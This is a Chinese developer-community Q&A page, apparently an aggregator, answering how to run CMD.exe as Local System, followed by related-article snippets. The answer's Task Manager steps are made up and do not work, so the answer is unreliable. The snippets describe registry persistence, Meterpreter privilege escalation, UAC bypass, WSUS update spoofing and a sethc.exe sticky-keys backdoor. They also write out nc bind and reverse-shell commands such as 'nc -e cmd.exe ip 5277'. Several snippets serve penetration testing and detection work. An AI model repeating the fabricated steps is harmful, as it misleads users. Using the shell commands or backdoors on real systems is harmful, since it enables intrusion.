开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何在本地系统帐户下运行CMD.exe？

在本地系统帐户下运行CMD.exe的方法如下：

打开Windows任务管理器（Task Manager）：按下Ctrl+Shift+Esc组合键或右键点击任务栏，然后选择任务管理器。
在任务管理器中，点击“更多详细信息”（Details）选项卡，然后点击“以不同用户身份运行”（Run as different user）。
在弹出的窗口中，点击“其他用户”（Other user），然后输入本地系统帐户的用户名和密码。
在“选择用户帐户”（Select user account）窗口中，选择“本地计算机上的用户帐户”（User accounts on this computer）。
点击“下一步”（Next），然后选择“cmd.exe”。
点击“确定”（OK），即可在本地系统帐户下运行CMD.exe。

注意：在运行CMD.exe时，请确保您具有管理员权限，以便能够执行需要管理员权限的命令。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Window权限维持（一）：注册表运行键

这种持久性技术需要创建注册表运行键各种威胁因素和已知工具，如Metasploit、Empire和SharPersist，都提供了这种能力，因此，成熟的SOC团队将能够检测到这种恶意活动。...注册表–当前用户的运行键如果已获得提升的凭据，则最好使用本地计算机注册表位置，而不是当前用户，因为有效负载将在每次系统启动时执行，而与使用系统身份验证的用户无关。...注册表–运行键本地计算机在下一次登录期间，有效负载将执行并与回传给Meterpeter。 ?...Metasploit – Meterpreter持久性脚本用户下次登录系统时，将打开一个新的Meterpreter会话。 ?...Metasploit –作为系统的持久性模块 SharPersist SharPersist是Brett Hawkins在C＃中开发的工具，它结合了多种持久性技术，包括添加注册表运行键。

1K4 0

msfconsole使用教程_kali msfconsole

命令：set function设置特定的配置参数（EG：设置本地或远程主机参数）。命令：setg function以全局方式设置特定的配置参数（EG：设置本地或远程主机参数）。...run scriptname 运行meterpreter脚本，在scripts/meterpreter目录下可查看到所有脚本名。 sysinfo 列出受控主机的系统信息。...getsystem 通过各种攻击向量来提升系统用户权限。 execute -f cmd.exe -i 执行cmd.exe命令并进行交互。...execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令并隐藏该进程。 rev2self 回到控制目标主机的初始用户账户下。...如发现本站有涉嫌侵权/违法违规的内容，请发送邮件至举报，一经查实，本站将立刻删除。

3.7K1 0

Hyperledger Fabric和VSCode的IBM区块链扩展开发智能合约

在本地Hyperledger Fabric实例上部署智能合约。使用Node.js SDK与已部署的智能合约包进行交互。...在32位系统上将Win32版本安装到C:\OpenSSL-Win32中。在64位系统上将Win64版本安装到C:\OpenSSL-Win64中。...以下Docker容器在本地计算机上启动，每个容器在网络中具有不同的角色：Orderer，Certificate Authority，CouchDB和Peer。...生成测试完成扩展后，你可以从demoContract目录运行npm test，也可以从MyContract-demoContract@0.0.2.test.js文件中单击VSCode UI中的运行测试按钮...，如gif所示。

2.7K3 0

BypassUAC技术总结

，保护系统进行不必要的更改，提升操作系统的稳定性和安全性。...管理员在正常情况下是以低权限运行任务的，这个状态被称为被保护的管理员。但当管理员要执行高风险操作（如安装程序等），就需要提升权限去完成这些任务。这个提升权限的过程通常是这样的，相信各位都眼熟过。...当你在管理员账户下运行此程序就会要求权限提升以及弹出UAC框。...当你在标准账户下运行此程序，由于此账户的最高权限就是标准账户，所以双击便运行白名单程序除了刚刚说的autoelevate，还有一类叫白名单程序的应用程序也是打开默认提权的。...这个机制简而言之便是可以给CLR提供一个dll，当任何高权限.NET运行时都会主动加载该DLL，我们可以构造恶意dll给CLR加载，从而获得高权限的进程如cmd，从而bypassuac。

8253 0

渗透测试利器msf常用命令

set function 设置特定的配置参数（EG：设置本地或远程主机参数）。 setg function 以全局方式设置特定的配置参数（EG：设置本地或远程主机参数）。...run scriptname 运行meterpreter脚本，在scripts/meterpreter目录下可查看到所有脚本名。 sysinfo 列出受控主机的系统信息。...ps 显示所有运行的进程以及相关联的用户账户。 migrate PID 迁移到一个指定的进程ID（PID号可通过ps命令从主机上获得）。...getsystem 通过各种攻击向量来提升系统用户权限。 execute -f cmd.exe -i 执行cmd.exe命令并进行交互。...execute -f cmd.exe -i -t 以所有可用令牌来执行cmd命令并隐藏该进程。 rev2self 回到控制目标主机的初始用户账户下。

1.4K9 0

区块链超级记帐本架构概览

块链运行称为chaincode的程序，保存状态和分类帐数据，并执行事务。链码是中间元素，因为事务是在链码上调用的操作。交易必须“认可”，只有认可的交易可能会对状态产生影响。...1.2.2分类帐分类帐提供了所有成功的状态变化（我们谈论有效的交易）和在系统运行期间发生的改变状态（我们谈论无效的交易）的尝试的成功的历史。...该政策为有效的交易签注（通常为一组签名人的签名）定义了必要和充分的条件，如第2节和第3节所述。在安装新的链码的部署事务的特殊情况下，（部署）认可政策是指定为系统链码的认可政策。 1.3.3。...delivery（）有时在pub-sub系统中称为notify（），或者在BFT系统中称为commit（）。分类帐和块形成。分类帐（参见第1.2.2节）包含订购服务输出的所有数据。...这与本地对等策略相似，只是在系统（块链）粒度上规定，而不是对等粒度。例如，GCVP可以指定：如果由11个不同的对等体确认，每个对等体可以信任检查点。

1.3K4 0

如何利用环境变量，拯救你低效的开发人生

1、定义环境变量（environment variables）一般是指在操作系统中用来指定操作系统运行环境的一些参数，如：临时文件夹位置和系统文件夹位置等。...例如Windows和DOS操作系统中的path环境变量，当要求系统运行一个程序而没有告诉它程序所在的完整路径时，系统除了在当前目录下面寻找此程序外，还应到path中指定的路径去找。...用户通过设置环境变量，来更好的运行进程。 2、常见环境变量 WINDOWS系统 %ALLUSERSPROFILE% 局部返回所有“用户配置文件”的位置。...%HOMEDRIVE% 系统返回连接到用户主目录的本地工作站驱动器号。基于主目录值的设置。用户主目录是在“本地用户和组”中指定的。 %HOMEPATH% 系统返回用户主目录的完整路径。...用户主目录是在“本地用户和组”中指定的。 %HOMESHARE% 系统返回用户的共享主目录的网络路径。基于主目录值的设置。用户主目录是在“本地用户和组”中指定的。

3981 0

使用Hyperledger Fabric和Composer实现区块链应用程序

但除了加密货币之外，还有更多有趣的应用程序可以带来许多激动人心的软件生态系统。这也适用于Hyperledger项目，该项目提供了一个非常模块化的区块链框架。...执行链代码功能可以读取和返回资产和/或创建和修改资产并将它们存储在本地分类帐数据库中。在节点上的本地持久性更改之后，将更改提交给网络（“认可”）并在其他组织接受后插入到区块链中。...结果，在每个通道中维护一个分布式分类帐，这可以被想象为链接交易的现金簿。每个参与者为他们所属的每个通道保留一份分类帐副本。这为网络中的每个现有信道创建了区块链数据结构。.../startFabric.sh 在网络运行时，composer-playground web-UI可以通过composer-playground启动。...对于Yeoman（使用模板设置项目的代码生成器，如Maven Archtypes），有一个模板（hyperledger-composer：businessnetwork。

2.1K2 0

Windows提权EXP多种执行方式

0x02 交互与非交互SHELL区别交互式SHELL：命令终端有与用户进行交互，会等待用户输入命令后立即执行，有回显，如：登录、退出、可执行文件或系统中的一些命令，这里以下边的这个批处理文件为例来进行测试...但有时在执行命令时可能会出现两个“拒绝访问”的情况，这可能是cmd被降权或系统安全设置造成，可尝试将我们上传到可读写目录中的提权EXP放在cmd.exe位置上去执行，也可以尝试用“”双引号将提权EXP括起来后再执行...通过ProcessExplorer工具可以看到我们的提权EXP已经成功执行了，并且单独创建了一个以SYSTEM权限运行的cmd.exe进程，所以这个提权EXP必须在交互式下执行才能利用成功。...注：本地测试发现CVE-2018-8639这个提权EXP在执行多次后可能会出现系统崩溃蓝屏的情况，可能是我测试环境问题，所以在实战场景中还需请谨慎使用，不作死就不会死！！！...0x06 本地攻击方式这里以MS17-010为例，虽然这是一个远程代码执行漏洞，但也可以用于本地权限提升，只需将IP地址修改为127.0.0.1即可，这招我给叫做：疯起来自己都打，就问你怕不怕。

1.8K2 0

如何使用RTA框架测试安全团队的威胁行为检测能力

例如，某些横向移动操作默认会针对本地主机（尽管参数通常允许进行多主机测试）。...在其他情况下，可执行文件（如 cmd.exe 或 python.exe）将被重命名，使其看起来像是 Windows 二进制文件正在执行非标准活动。...工具要求由于该工具基于Python 2.7开发，因此我们首先需要在本地设备上安装并配置好Python 2.7环境。...需要注意的是，Windows Defender或其他防病毒产品可能会在RTA运行时阻止或以其他方式干扰RTA。在根据测试目标运行RTA之前，请考虑如何在测试主机上配置安全产品。...工具运行如果直接运行RTA的话，可以直接执行下列命令： python powershell_args.py 如需运行这个那个RTA目录，最简python run_rta.py单的方法就是使用run_rta.py

1801 0

Blackhat专题：WSUS漏洞利用的理论与实践

攻击者可以用中间人(Man In The Middle, MITM)攻击利用该漏洞，让用户下载并且安装伪造的更新。...客户端周期性的运行wuauctl.exe与更新服务器通信，以检查目前是否有新的更新。如果有，便下载安装这些更新。在企业环境下，成千上万的客户端重复下载相同的更新无疑会对带宽造成极大的浪费。...WSUS可以说是一个更新代理服务器：WSUS 服务器从Internet下载了更新并且将其缓存在本地，并对网络里的其他windows计算机提供更新服务。...（第一个想到的是cmd.exe，但是cmd.exe其实并没有被微软签名） ? 这样，攻击者就可以把psexec或者bginfo伪装成更新，配以构造的安装脚本，推送到客户端得以安装运行。 4....发现bginfo.exe已经被下载到了本地。 ? 试着安装一下，成功！ ? ? ? *FreeBuf特约作者：nickchang ，未经许可禁止转载

1.7K6 0

linux nc命令小结

再在本地机器上运行： nc -l -p 777 意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。...e cmd.exe 【本地运行】nc -nvv 192.168.1.101 2012 【命令解释】采用正向连接方式，远程主机（注：假设IP地址为 192.168.1.101）上运行 nc -l -p...2012 -t -e cmd.exe 意为绑定远程主机的 CMD 到【命令解释】2012 端口，当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ；在本地主机上运行 nc -nvv...溢出远程主机时，一旦溢出的远程主机连接本地主机 8989 端口，远程主机就会自动用 FTP 下载指定的文件，如木马。...本地运行：nc -l -p 5277 （监听本地5277端口）或者 nc -l -v -p 5277 然后在远程机器上，想办法运行 nc -e cmd.exe ip 5277 （你可别真的打“ip”

6.1K3 1

浅谈windows提权

方法三：系统漏洞提权黑客一般都会有自己的入本地提权漏洞利用包如：CVE-2019-0841、CVE-2020-0787等等 ?...方法五: 粘滞键后门 windows下连续按五次shift会调用 c:\windows\system32\sethc.exe 在我们已经登录系统时，这个程序是以我们自己的用户权限运行的。...但是当我们未登陆系统(停留在登陆界面)的时候系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后门的话系统将会以system用户(比管理员更高级别的权限)来运行sethc.exe这个程序...ü 主要步骤： ü 备份sethc.exe文件 ü 替换sethc.exe为cmd.exe 看完一些常见的手段，我们再来看看一些防护方法。 ?...运行窗口输入：gpedit.msc运行组策略展开“计算机配置”——Windows设置——安全设置——本地策略——审核策略——审核策略更改——勾选“成功”——点击确定对“审核登录事件”和“审核过程追踪

9592 0

Python：pycharm中虚拟环境 venv简介及实践

一、虚拟环境的必要性不进行虚拟化会产生的问题在平时使用 python 时，有可能会遇到这几个常见的问题： A.当运行的项目处于不同版本时（如 python 2.7/3.7 ），要通过切换 python...解释器的版本来运行程序（或要使用 python2/3 pip/pip3 等指令来对应不同的版本）。...cmd.exe C:\> mq\Scripts\activate.bat 可以看到前面多了一个(mq)的提示，说明我们已经进入到虚拟环境中了。...在虚拟环境里，我们可以像正常一样操作里面的文件，或是安装第三方模块，只不过这一些都只会影响到本地的内容了。...3、退出虚拟环境时，我们可以输入 deactivate 这个指令来退出 cmd.exe C:\> mq\Scripts\deactivate.bat 2.

2061 0

关于Powershell 你要知道的知识！

1.背景及介绍在最初的时候，Powershell 是设计运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境。...Windows Powershell V1诞生与2006年，你可以把它看成是命令行提示符cmd.exe的扩充，不对，应当是颠覆。powershell需要.NET环境的支持，同时支持.NET对象。...如何在 PowerShell中使用数千个命令(cmdlet)，很好地使用帮助系统是使用PowerShell成功的关键。...3.1本地+在线 PowerShell的帮助文档提供了本地+在线的两种方式，在本地使用 help + cmdlet 的命令，即可看到关于这个 cmdlet 的使用详解，在后面跟上 -online 参数...更新本地帮助系统(建议定期更新)，以便该计算机无法访问Internet时，仍可为我们提供帮助。

1.3K3 0

批处理变量详谈

也就是获得当前路径，并将其转换为字符串 %CMDCMDLINE% 本地返回用来启动当前的 Cmd.exe 的准确命令行 %CMDEXTVERSION% 系统返回当前的 "命令处理程序扩展" 的版本号...也就是返回 cmd.exe 的路径，一般在 C:\WINDOWS\system32\cmd.exe %DATE% 系统返回当前日期字符串。...Windows 操作系统都是基于 x86 架构开发的，国产CPU 不是采用 x86 指令集，所以无法运行 Windows %PROCESSOR_IDENTFIER% 系统返回处理器说明 %PROCESSOR_LEVEL...由 Cmd.exe 生成 %RANDOM% 系统返回 0 到 32767 之间的任意十进制数字。...由 Cmd.exe 生成 %SYSTEMDRIVE% 系统返回包含Windows server operation system根目录（即系统根目录）的驱动器 %SYSTEMROOT% 系统返回 Windows

7872 0

如何使用S4UTomato通过Kerberos将服务账号提权为LocalSystem

工具运行机制熟悉“Potato”系列权限提升工具的研究人员肯定知道，这类工具可以将服务账号提升为本地系统权限，“Potato”所使用的技术和S4UTomato类似，即利用COM接口的特定功能，欺骗NT...接下来，通过一系列API调用，并在身份认证过程中执行中间人攻击（NTLM中继），以生成针对目标本地系统中NT AUTHORITY\SYSTEM账号的访问令牌。...因此，我们可以使用S4UTomato来获取本地机器上域管理员帐户“administrator”的服务凭证，然后在SCMUACBypass工具的帮助下，利用该凭证创建系统服务并获得SYSTEM权限。...在计算机加入域的任意情况下，只要我们能够在Windows服务帐户或Microsoft虚拟帐户的上下文下运行代码，就可以利用上述技术进行本地权限提升。...S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f （向右滑动，查看更多）通过Tgtdeleg实现本地特权提升 # 首先通过Tgtdeleg

2121 0

常用运行命令大全

序言：在使用电脑或者阅读文档过程中，总会遇到诸如在运行框中输入一些简短的命令如cmd、notepad、calc等快速跳出应用程序或系统配置等情况；它们是如何实现的呢，常用的运行命令又有哪些呢？...开始搜索框中输入对应的命令，如cmd cmd命令提示符中输入对应命令，如notepad（记事本） 3.说明运行命令中有“.exe”、“.cpl”、“.msc”等结尾的命令，其中“.exe”是可以省略的...，比如cmd命令，其实全名是“cmd.exe”，大多数情况为了省事，我们直接输入“cmd”即可，其他命令不能省略。...，紫色标记则是普通用户的命令提示符）有些命令在XP系统能用，但是win7之后系统不能用，如winchat---XP自带局域网聊天等运行命令在系统中的路径为：C:\Windows\System32...--磁盘管理器 regedit---注册表编辑器 gpedit.msc---组策略 secpol.msc---本地安全策略 services.msc---本地服务 ncpa.cpl---网络连接 taskmgr

2.9K2 0

2018-06-13 对账系统的设计咱们聊聊对账系统该如何设计

在银行或者第三方支付中，对账其实是对一定周期内的交易进行双方确认的过程，一般都是在第二天银行或者第三方支付公司对前一日交易进行清分，生成对账单供平台商户下载，并将应结算款结算给平台商户。...对账方式单向对账：一般拿第三方支付机构或银行流水，与自己系统进行对账，防止出现掉单问题；双向对账：两个应用间的流水进行双向核对，如订单与财务系统，既要保证财务系统支付成功的记录，订单系统也是成功的；...我们一般采用双向对账的方式进行对账对账相关的问题不同系统日切点不一致问题：滚动对账差错处理：补账，补偿（退款）相关概念轧帐和平帐每一笔交易，都要做到各参与者的记录能够吻合，没有偏差。...对账系统的工作，是发现有差异的记录，即轧帐；然后通过人工或者自动的方式，解决这些差异，即平帐。...6、差错处理在一般系统中，差错处理分为两种，一种人工来处理，一种系统自动来处理。主要有如下情况：本地未支付，支付渠道已支付。这主要是本地未正确接收到渠道下发的异步通知导致。

5K6 0

一例门罗币矿工Downloader的DGA解析

appdata 文件夹并创建计划任务以在重新启动时运行的安装脚本（MD5：31c740ee5ebd975decd8345baa5ff4e6）将 launcher.bat 恶意软件复制到本地 AppData...这两个样本文件都执行以下四个步骤： 1.检查杀软，发现就退出 2.收集系统信息 3.与 C&C 服务器通信下载实际恶意软件 4.确保下载的恶意软件运行，并在必要时重新启动反杀软两个样本都使用相同的反杀软检查方法...基于 Tor 的 Downloader 可以通过运行以下命令得到更多细节： cmd.exe /c “(wmic computersystem get /format:list) cmd.exe /c “...(wmic cpu get /format:list) cmd.exe /c “(wmic memorychip get /format:list) cmd.exe /c “(wmic path Win32...首先，恶意软件使用简单的 HTTP GET 请求将系统信息发送到 hello.php： GET /hello.php?

1K5 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭